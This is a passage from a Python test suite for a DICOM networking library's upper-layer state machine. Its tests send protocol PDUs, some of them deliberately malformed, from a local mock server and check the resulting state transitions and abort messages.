# Sta3 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('wait', 0.1),
('send', a_associate_rq),
('send', b'\x08\x00\x00\x00\x00\x00\x00\x00'),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
assoc.start()
time.sleep(0.15)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt19', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt19']
class TestState04(TestStateBase):
"""Tests for State 04: Awaiting TRANSPORT_OPEN from <transport service>."""
def test_evt01(self):
"""Test Sta4 + Evt1."""
# Sta4 + Evt1 -> <ignore> -> Sta4
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('wait', 0.3)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta4 + Evt2."""
# Sta4 + Evt2 -> <ignore> -> Sta4
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta4 + Evt3."""
# Sta4 + Evt3 -> <ignore> -> Sta4
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
commands = [
('send', a_associate_ac)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt3']
def test_evt04(self):
"""Test Sta4 + Evt4."""
# Sta4 + Evt4 -> <ignore> -> Sta4
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
commands = [
('send', a_associate_rj)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt4']
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta4 + Evt5."""
# Sta4 + Evt5 -> AE-5 -> Sta2
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
# AE-5: Issue TRANSPORT_RESPONSE to <transport service>
# Start ARTIM timer
pass
def test_evt06(self):
"""Test Sta4 + Evt6."""
# Sta4 + Evt6 -> <ignore> -> Sta4
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
commands = [
('send', a_associate_rq)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt6']
def test_evt07(self):
"""Test Sta4 + Evt7."""
# Sta4 + Evt7 -> <ignore> -> Sta4
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('wait', 0.3)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt7']
def test_evt08(self):
"""Test Sta4 + Evt8."""
# Sta4 + Evt8 -> <ignore> -> Sta4
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('wait', 0.3)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt8']
def test_evt09(self):
"""Test Sta4 + Evt9."""
# Sta4 + Evt9 -> <ignore> -> Sta4
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('wait', 0.3)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt9']
def test_evt10(self):
"""Test Sta4 + Evt10."""
# Sta4 + Evt10 -> <ignore> -> Sta4
# Evt10: Receive P-DATA-TF PDU from <remote>
commands = [
('send', p_data_tf)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt10']
def test_evt11(self):
"""Test Sta4 + Evt11."""
# Sta4 + Evt11 -> <ignore> -> Sta4
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('wait', 0.3)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt11']
def test_evt12(self):
"""Test Sta4 + Evt12."""
# Sta4 + Evt12 -> <ignore> -> Sta4
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
commands = [
('send', a_release_rq)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt12']
def test_evt13(self):
"""Test Sta4 + Evt13."""
# Sta4 + Evt13 -> <ignore> -> Sta4
# Evt13: Receive A-RELEASE-RP PDU from <remote>
commands = [
('send', a_release_rp)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
        while self.fsm.current_state != 'Sta4':
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt13']
def test_evt14(self):
"""Test Sta4 + Evt14."""
# Sta4 + Evt14 -> <ignore> -> Sta4
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('wait', 0.3)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt14']
def test_evt15(self):
"""Test Sta4 + Evt15."""
# Sta4 + Evt15 -> <ignore> -> Sta4
# Evt15: Receive A-ABORT (rq) primitive from <local user>
commands = [
('wait', 0.3)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_abort())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt15']
def test_evt16(self):
"""Test Sta4 + Evt16."""
# Sta4 + Evt16 -> <ignore> -> Sta4
# Evt16: Receive A-ABORT PDU from <remote>
commands = [
('send', a_abort)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt16']
def test_evt17(self):
"""Test Sta4 + Evt17."""
# Sta4 + Evt17 -> <ignore> -> Sta4
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
commands = []
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt17']
def test_evt18(self):
"""Test Sta4 + Evt18."""
# Sta4 + Evt18 -> <ignore> -> Sta4
# Evt18: ARTIM timer expired from <local service>
commands = [
('wait', 0.3)
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt18']
def test_evt19(self):
"""Test Sta4 + Evt19."""
# Sta4 + Evt19 -> <ignore> -> Sta4
# Evt19: Received unrecognised or invalid PDU from <remote>
commands = [
('send', b'\x08\x00\x00\x00\x00\x00\x00\x00\x00')
]
scp = self.start_server(commands)
def connect(address):
"""Override the socket's connect so no event gets added."""
if self.assoc.dul.socket.socket is None:
self.assoc.dul.socket.socket = self.assoc.dul.socket._create_socket()
try:
self.assoc.dul.socket.socket.connect(address)
self.assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
self.assoc.dul.socket.close()
self.assoc.dul.socket.connect = connect
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt19']
class TestState05(TestStateBase):
"""Tests for State 05: Awaiting A-ASSOCIATE-AC or A-ASSOCIATE-RJ PDU."""
def test_evt01(self):
"""Test Sta5 + Evt1."""
# Sta5 + Evt1 -> <ignore> -> Sta5
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None), # recv a-associate-rq
('wait', 0.2)
]
scp = self.start_server(commands)
self.assoc.start()
while self.fsm.current_state != 'Sta5':
time.sleep(0.05)
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:2] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:2] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta5 + Evt2."""
# Sta5 + Evt2 -> <ignore> -> Sta5
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta5 + Evt3."""
# Sta5 + Evt3 -> AE-3 -> Sta6
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AE-3: Issue A-ASSOCIATE (ac) primitive
commands = [
('recv', None),
('send', a_associate_ac),
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt3']
def test_evt04(self):
"""Test Sta5 + Evt4."""
# Sta5 + Evt4 -> AE-4 -> Sta1
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AE-4: Issue A-ASSOCIATE (rj) primitive
commands = [
('recv', None),
('send', a_associate_rj),
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt4', 'AE-4'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta1']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt4']
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta1 + Evt5."""
# Sta5 + Evt5 -> <ignore> -> Sta5
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
# AE-5: Issue TRANSPORT_RESPONSE to <transport service>
# Start ARTIM timer
pass
def test_evt06(self):
"""Test Sta5 + Evt6."""
# Sta5 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_rq),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt6']
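        # The expected bytes are an A-ABORT PDU; assuming the PDU layout from
        # PS3.8: type 0x07, reserved, 4-byte length (= 4), two reserved bytes,
        # source 0x02 (DUL service-provider), reason 0x00.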
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt07(self):
"""Test Sta5 + Evt7."""
# Sta5 + Evt7 -> <ignore> -> Sta5
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
self.assoc.start()
while self.fsm.current_state != 'Sta5':
time.sleep(0.05)
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:2] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:2] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt7']
def test_evt08(self):
"""Test Sta5 + Evt8."""
# Sta5 + Evt8 -> <ignore> -> Sta5
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
self.assoc.start()
while self.fsm.current_state != 'Sta5':
time.sleep(0.05)
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:2] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:2] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt8']
def test_evt09(self):
"""Test Sta5 + Evt9."""
# Sta5 + Evt9 -> <ignore> -> Sta5
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('recv', None), # recv a-associate-rq
('wait', 0.2),
]
scp = self.start_server(commands)
self.assoc.start()
while self.fsm.current_state != 'Sta5':
time.sleep(0.05)
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:2] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:2] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt9']
def test_evt10(self):
"""Test Sta5 + Evt10."""
# Sta5 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', p_data_tf),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt10', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt10']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt11(self):
"""Test Sta5 + Evt11."""
# Sta5 + Evt11 -> <ignore> -> Sta5
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
self.assoc.start()
while self.fsm.current_state != 'Sta5':
time.sleep(0.05)
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:2] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:2] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt11']
def test_evt12(self):
"""Test Sta5 + Evt12."""
# Sta5 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_release_rq),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt12', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt12']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt13(self):
"""Test Sta5 + Evt13."""
# Sta5 + Evt13 -> AA-8 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_release_rp),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt13', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt13']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt14(self):
"""Test Sta5 + Evt14."""
# Sta5 + Evt14 -> <ignore> -> Sta5
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
self.assoc.start()
while self.fsm.current_state != 'Sta5':
time.sleep(0.05)
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:2] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:2] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt14']
def test_evt15(self):
"""Test Sta5 + Evt15."""
# Sta5 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU and restart ARTIM
commands = [
('recv', None),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while self.fsm.current_state != 'Sta5':
time.sleep(0.05)
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_abort())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt15', 'AA-1'),
('Sta13', 'Evt17', 'AR-5'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta13', 'Sta1']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt15', 'Evt17']
        # Issue A-ABORT PDU (source byte 0x00: aborted by the local service-user)
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt16(self):
"""Test Sta5 + Evt16."""
# Sta5 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
        # AA-3: If service-user initiated:
        #     Issue A-ABORT primitive and close transport
        # Otherwise
        #     Issue A-P-ABORT primitive and close transport
commands = [
('recv', None),
('send', a_abort),
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt16', 'AA-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta1']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt16']
def test_evt17(self):
"""Test Sta5 + Evt17."""
        # Sta5 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt17', 'AA-4'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta1']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt17']
def test_evt18(self):
"""Test Sta5 + Evt18."""
# Sta5 + Evt18 -> <ignore> -> Sta5
# Evt18: ARTIM timer expired from <local service>
commands = [
('recv', None),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while self.fsm.current_state != 'Sta5':
time.sleep(0.05)
time.sleep(0.1)
